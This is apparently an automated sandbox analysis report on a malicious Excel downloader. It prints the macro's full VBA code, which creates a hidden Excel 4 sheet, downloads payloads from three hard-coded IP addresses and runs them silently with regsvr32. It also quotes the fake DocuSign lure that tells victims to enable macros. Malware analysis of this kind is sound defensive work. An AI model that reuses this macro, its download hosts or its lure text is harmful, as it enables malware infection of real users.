Verdict: Malicious
Classifications: Downloader, Injector
Threat Names: Mal/HTMLGen-A, Gen:Variant.Bulz.604474
Dynamic Analysis Report
Created on 2021-09-27T19:15:00
Sample: 3982ae3e61a6ba86d61bd8f017f6238cc9afeb08b785010d686716e8415b6a36.xlsx.xls (Excel Document)
Remarks (1/1)
(0x0200000E): The overall sleep time of all monitored processes was truncated from "3 days, 5 hours, 54 minutes, 21 seconds" to "8 hours, 47 minutes, 56 seconds" to reveal dormant functionality.
This list contains only the embedded files, downloaded files, and dropped files.
File Name | Category | Type | Verdict |
---|---|---|---|
C:\Users\RDhJ0CNFevzX\Desktop\3982ae3e61a6ba86d61bd8f017f6238cc9afeb08b785010d686716e8415b6a36.xlsx.xls | Sample File | Excel Document | malicious |
Office Information
Creator | Test |
Last Modified By | Test |
Create Time | 2015-06-05 18:17:20+00:00 |
Modify Time | 2021-09-27 09:38:52+00:00 |
Codepage | ANSI_Cyrillic |
Application | Microsoft Excel |
App Version | 16.0 |
Document Security | NONE |
Titles Of Parts | Sheet1 |
scale_crop | False |
shared_doc | False |
Controls (1)
CLSID | Control Name | Associated Vulnerability |
---|---|---|
{00020820-0000-0000-C000-000000000046} | Excel97Sheet | - |
VBA Macros (2)
Macro #1: Module5
Deobfuscated Code
Attribute VB_Name = "Module5"
Sub auto_open()
On Error Resume Next
Application.ScreenUpdating = False
Gert
Sheets("Sheet777").Visible = False
Sheets("Sheet777").Range("A1:M100").Font.Color = 16777215
Sheets("Sheet777").Range("H24") = "http://190.14.37.178/"
Sheets("Sheet777").Range("H25") = "http://185.183.96.67/"
Sheets("Sheet777").Range("H26") = "http://185.250.148.213/"
Sheets("Sheet777").Range("K17") = "=NOW()"
Sheets("Sheet777").Range("K18") = ".dat"
Sheets("Sheet777").Range("K18") = ".dat"
Sheets("Sheet777").Range("H35") = "=HALT()"
Sheets("Sheet777").Range("I9") = "uRlMon"
Sheets("Sheet777").Range("I10") = "UserForm2"
Sheets("Sheet777").Range("I11") = "JJCCBB"
Sheets("Sheet777").Range("I12") = "Byukilos"
Sheets("Sheet777").Range("G10") = "..\Drezd.red"
Sheets("Sheet777").Range("G11") = "..\Drezd1.red"
Sheets("Sheet777").Range("G12") = "..\Drezd2.red"
Sheets("Sheet777").Range("I17") = "regsvr32 -silent ..\Drezd.red"
Sheets("Sheet777").Range("I18") = "regsvr32 -silent ..\Drezd1.red"
Sheets("Sheet777").Range("I19") = "regsvr32 -silent ..\Drezd2.red"
Sheets("Sheet777").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
Sheets("Sheet777").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
Sheets("Sheet777").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
Sheets("Sheet777").Range("H9") = "=REGISTER(I9,I10&J10,I11,I12,,1,9)"
Sheets("Sheet777").Range("H17") = "=EXEC(I17)"
Sheets("Sheet777").Range("H18") = "=EXEC(I18)"
Sheets("Sheet777").Range("H19") = "=EXEC(I19)"
Application.Run Sheets("Sheet777").Range("H1")
End Sub
Sub auto_close()
On Error Resume Next
Application.ScreenUpdating = True
Application.DisplayAlerts = False
Sheets("Sheet777").Delete
Application.DisplayAlerts = True
End Sub
Function Gert()
Set Fera = Excel4IntlMacroSheets
Fera.Add.Name = "Sheet777"
End Function
Original Code
Attribute VB_Name = "Module5"
Sub auto_open()
On Error Resume Next
Trewasd = "REGISTER"
Drezden = "="
Naret = "EXEC"
Application.ScreenUpdating = False
Gert
Sheets("Sheet777").Visible = False
Sheets("Sheet777").Range("A1:M100").Font.Color = vbWhite
Sheets("Sheet777").Range("H24") = UserForm2.Label1.Caption
Sheets("Sheet777").Range("H25") = UserForm2.Label3.Caption
Sheets("Sheet777").Range("H26") = UserForm2.Label4.Caption
Sheets("Sheet777").Range("K17") = "=NOW()"
Sheets("Sheet777").Range("K18") = ".dat"
Sheets("Sheet777").Range("K18") = ".dat"
Sheets("Sheet777").Range("H35") = "=HALT()"
Sheets("Sheet777").Range("I9") = UserForm2.Label2.Caption
Sheets("Sheet777").Range("I10") = UserForm2.Caption
Sheets("Sheet777").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B"
Sheets("Sheet777").Range("I12") = "Byukilos"
Sheets("Sheet777").Range("G10") = "..\Drezd.red"
Sheets("Sheet777").Range("G11") = "..\Drezd1.red"
Sheets("Sheet777").Range("G12") = "..\Drezd2.red"
Sheets("Sheet777").Range("I17") = "regsvr32 -silent ..\Drezd.red"
Sheets("Sheet777").Range("I18") = "regsvr32 -silent ..\Drezd1.red"
Sheets("Sheet777").Range("I19") = "regsvr32 -silent ..\Drezd2.red"
Sheets("Sheet777").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
Sheets("Sheet777").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
Sheets("Sheet777").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
Sheets("Sheet777").Range("H9") = Drezden & Trewasd & "(I9,I10&J10,I11,I12,,1,9)"
Sheets("Sheet777").Range("H17") = Drezden & Naret & "(I17)"
Sheets("Sheet777").Range("H18") = Drezden & Naret & "(I18)"
Sheets("Sheet777").Range("H19") = Drezden & Naret & "(I19)"
Application.Run Sheets("Sheet777").Range("H1")
End Sub
Sub auto_close()
On Error Resume Next
Application.ScreenUpdating = True
Application.DisplayAlerts = False
Sheets("Sheet777").Delete
Application.DisplayAlerts = True
End Sub
Function Gert()
Set Fera = Excel4IntlMacroSheets
Fera.Add.Name = "Sheet777"
End Function
Macro #2: ThisWorkbook
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private m_openAlreadyRan As Boolean
Private m_isOpenDelayed As Boolean
Friend Sub FireOpenEventIfNeeded(Optional dummyVarToMakeProcHidden As Boolean)
End Sub
Private Sub asWorkbook_Activateas()
On Error Resume Next
If m_isOpenDelayed Then
m_isOpenDelayed = False
InitWorkbook
End If
End Sub
Private Sub saWorkbook_Opensa()
On Error Resume Next
End Sub
Private Sub ssaaInitWorkbookssaa()
On Error Resume Next
If VBA.Val(Application.Version) < 12 Then
Me.Close False
Exit Sub
End If
'
'Other code
'
'
'
End Sub
Extracted Image Texts (1)
Image 1: 0.JPG
DocuSign
THIS DOCUMENT ENCRYPTED BY
DOCUSIGN® PROTECT SERVICE
This steps are required to fully decrypt the document,
encrypted by DocuSign
1. If this docs
above
example of notification
PROTECTED VIEW This file originated from an internet location and might be unsafe. Click for more details. Enable Editing
2. Click to “Enable Content” to perform Microsoft Excel Decryption Core to start the decryption of the
document
example of notification
SECURITY WARNING Macros have been disabled. Enable Macros
Why I can not open this document?
nt was downloaded from e-mail, then please click “Enable editing” in the yellow bar
- You are using iOS or Android device. Please use Desktop PC.
- You are trying to view this document using Online Viewer.
Norton Microsoft Office
© DocuSign Inc. 2021
CFB Streams (21)
Name | ID | Size |
---|---|---|
Root\Workbook | 1 | 99.44 KB |
Root\_VBA_PROJECT_CUR\VBA\dir | 4 | 1.02 KB |
Root\_VBA_PROJECT_CUR\VBA\Sheet1 | 5 | 991 Bytes |
Root\_VBA_PROJECT_CUR\VBA\Module5 | 6 | 4.14 KB |
Root\_VBA_PROJECT_CUR\VBA\__SRP_0 | 7 | 2.40 KB |
Root\_VBA_PROJECT_CUR\VBA\__SRP_1 | 8 | 138 Bytes |
Root\_VBA_PROJECT_CUR\VBA\__SRP_2 | 9 | 264 Bytes |
Root\_VBA_PROJECT_CUR\VBA\__SRP_3 | 10 | 256 Bytes |
Root\_VBA_PROJECT_CUR\VBA\UserForm2 | 11 | 1.15 KB |
Root\_VBA_PROJECT_CUR\VBA\ThisWorkbook | 12 | 2.44 KB |
Root\_VBA_PROJECT_CUR\VBA\_VBA_PROJECT | 13 | 4.23 KB |
Root\_VBA_PROJECT_CUR\PROJECT | 14 | 662 Bytes |
Root\_VBA_PROJECT_CUR\PROJECTlk | 15 | 30 Bytes |
Root\_VBA_PROJECT_CUR\PROJECTwm | 16 | 116 Bytes |
Root\_VBA_PROJECT_CUR\UserForm2\f | 18 | 226 Bytes |
Root\_VBA_PROJECT_CUR\UserForm2\o | 19 | 272 Bytes |
Root\_VBA_PROJECT_CUR\UserForm2\CompObj | 20 | 97 Bytes |
Root\_VBA_PROJECT_CUR\UserForm2\VBFrame | 21 | 302 Bytes |
Root\SummaryInformation | 22 | 208 Bytes |
Root\DocumentSummaryInformation | 23 | 244 Bytes |
Root\CompObj | 24 | 108 Bytes |
Extracted URLs (3)
URL | WHOIS Data | Reputation Status | Recursively Submitted |
---|---|---|---|
http://185.183.96.67 | Not Queried | N/A | - |
http://185.250.148.213 | Not Queried | N/A | - |
http://190.14.37.178 | Not Queried | N/A | - |
File Name | Category | Type | Verdict |
---|---|---|---|
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\counters.dat | Modified File | Stream | clean |
c:\lsarpc | Dropped File | Unknown | clean |
c:\users\rdhj0cnfevzx\appdata\local\temp\~df29dbd0834f02d2ce.tmp | Dropped File | Stream | clean (known to be clean) |
c:\users\rdhj0cnfevzx\appdata\local\temp\~dfad4a9cdf69cebb65.tmp | Dropped File | Stream | clean (known to be clean) |
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text | clean |
PE Information
Image Base | 0x10000000 |
Entry Point | 0x10001000 |
Size Of Code | 0x30a00 |
Size Of Initialized Data | 0x1f600 |
File Type | FileType.dll |
Subsystem | Subsystem.windows_gui |
Machine Type | MachineType.i386 |
Compile Timestamp | 2021-09-10 16:49:09+00:00 |
Sections (9)
Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy |
---|---|---|---|---|---|---|
.text | 0x10001000 | 0x3090c | 0x30a00 | 0x400 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 3.39 |
.edata | 0x10032000 | 0x70 | 0x200 | 0x30e00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 0.0 |
.data | 0x10033000 | 0x2000 | 0x1400 | 0x31000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.0 |
.data | 0x10035000 | 0xbf54 | 0xc000 | 0x32400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.0 |
.rdatat | 0x10041000 | 0x648 | 0x800 | 0x3e400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.0 |
.rsrc | 0x10042000 | 0x10bf4 | 0x10c00 | 0x3ec00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 0.0 |
- | 0x10053000 | 0x5000 | 0x5000 | 0x4f800 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.0 |
- | 0x10058000 | 0x5000 | 0x5000 | 0x54800 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.0 |
- | 0x1005d000 | 0x5000 | 0x5000 | 0x59800 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.0 |
File Name | Category | Type | Verdict |
---|---|---|---|
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\hztfec57\t4[1] | Dropped File | Text | clean |
PE Information
Image Base | 0x10000000 |
Entry Point | 0x10001000 |
Size Of Code | 0x30a00 |
Size Of Initialized Data | 0x1f600 |
File Type | FileType.dll |
Subsystem | Subsystem.windows_gui |
Machine Type | MachineType.i386 |
Compile Timestamp | 2021-09-10 16:49:09+00:00 |
Sections (9)
Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy |
---|---|---|---|---|---|---|
.text | 0x10001000 | 0x3090c | 0x30a00 | 0x400 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.09 |
.edata | 0x10032000 | 0x70 | 0x200 | 0x30e00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 1.32 |
.data | 0x10033000 | 0x2000 | 0x1400 | 0x31000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.0 |
.data | 0x10035000 | 0xbf54 | 0xc000 | 0x32400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.08 |
.rdatat | 0x10041000 | 0x648 | 0x800 | 0x3e400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.75 |
.rsrc | 0x10042000 | 0x10bf4 | 0x10c00 | 0x3ec00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 3.09 |
- | 0x10053000 | 0x5000 | 0x5000 | 0x4f800 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.0 |
- | 0x10058000 | 0x5000 | 0x5000 | 0x54800 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.0 |
- | 0x1005d000 | 0x5000 | 0x5000 | 0x59800 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.0 |
Imports (17)
kernel32.dll (6)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GetProcAddress | - | 0x10041030 | 0x41274 | 0x3e674 | 0x0 |
LoadLibraryA | - | 0x10041034 | 0x41278 | 0x3e678 | 0x0 |
VirtualAlloc | - | 0x10041038 | 0x4127c | 0x3e67c | 0x0 |
VirtualProtect | - | 0x1004103c | 0x41280 | 0x3e680 | 0x0 |
GetCurrentThread | - | 0x10041040 | 0x41284 | 0x3e684 | 0x0 |
lstrcmpA | - | 0x10041044 | 0x41288 | 0x3e688 | 0x0 |
user32.dll (3)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
SetWindowPos | - | 0x100410a0 | 0x412e4 | 0x3e6e4 | 0x0 |
ShowCursor | - | 0x100410a4 | 0x412e8 | 0x3e6e8 | 0x0 |
ShowWindow | - | 0x100410a8 | 0x412ec | 0x3e6ec | 0x0 |
ole32.dll (8)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
CoCreateGuid | - | 0x10041054 | 0x41298 | 0x3e698 | 0x0 |
OleUninitialize | - | 0x10041058 | 0x4129c | 0x3e69c | 0x0 |
CoFreeUnusedLibraries | - | 0x1004105c | 0x412a0 | 0x3e6a0 | 0x0 |
CoGetCurrentProcess | - | 0x10041060 | 0x412a4 | 0x3e6a4 | 0x0 |
CoGetCurrentLogicalThreadId | - | 0x10041064 | 0x412a8 | 0x3e6a8 | 0x0 |
CoFileTimeNow | - | 0x10041068 | 0x412ac | 0x3e6ac | 0x0 |
CoGetContextToken | - | 0x1004106c | 0x412b0 | 0x3e6b0 | 0x0 |
OleInitialize | - | 0x10041070 | 0x412b4 | 0x3e6b4 | 0x0 |
gdi32.dll (1)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GdiGetBitmapBitsSize | - | 0x10041018 | 0x4125c | 0x3e65c | 0x0 |
advapi32.dll (1)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
SystemFunction003 | - | 0x10041000 | 0x41244 | 0x3e644 | 0x0 |
imagehlp.dll (1)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
FindFileInPath | - | 0x10041028 | 0x4126c | 0x3e66c | 0x0 |
msimg32.dll (1)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
AlphaBlend | - | 0x1004104c | 0x41290 | 0x3e690 | 0x0 |
version.dll (1)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GetFileVersionInfoSizeA | - | 0x100410b0 | 0x412f4 | 0x3e6f4 | 0x0 |
winmm.dll (1)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
auxGetVolume | - | 0x100410b8 | 0x412fc | 0x3e6fc | 0x0 |
winspool.drv (1)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
AddPortW | - | 0x100410c0 | 0x41304 | 0x3e704 | 0x0 |
comctl32.dll (1)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GetEffectiveClientRect | - | 0x10041008 | 0x4124c | 0x3e64c | 0x0 |
oledlg.dll (1)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
OleUIPromptUserW | - | 0x10041088 | 0x412cc | 0x3e6cc | 0x0 |
comdlg32.dll (1)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GetFileTitleA | - | 0x10041010 | 0x41254 | 0x3e654 | 0x0 |
gdiplus.dll (1)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GdipImageSelectActiveFrame | - | 0x10041020 | 0x41264 | 0x3e664 | 0x0 |
shell32.dll (1)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
SHFileOperationA | - | 0x10041090 | 0x412d4 | 0x3e6d4 | 0x0 |
shlwapi.dll (1)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
SHRegSetUSValueA | - | 0x10041098 | 0x412dc | 0x3e6dc | 0x0 |
oleaut32.dll (1)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
SysAllocString | - | 0x10041080 | 0x412c4 | 0x3e6c4 | 0x0 |
Exports (2)
API Name | EAT Address | Ordinal |
---|---|---|
GetClass | 0x555f6 | 0x1 |
SetClass | 0x3804d | 0x2 |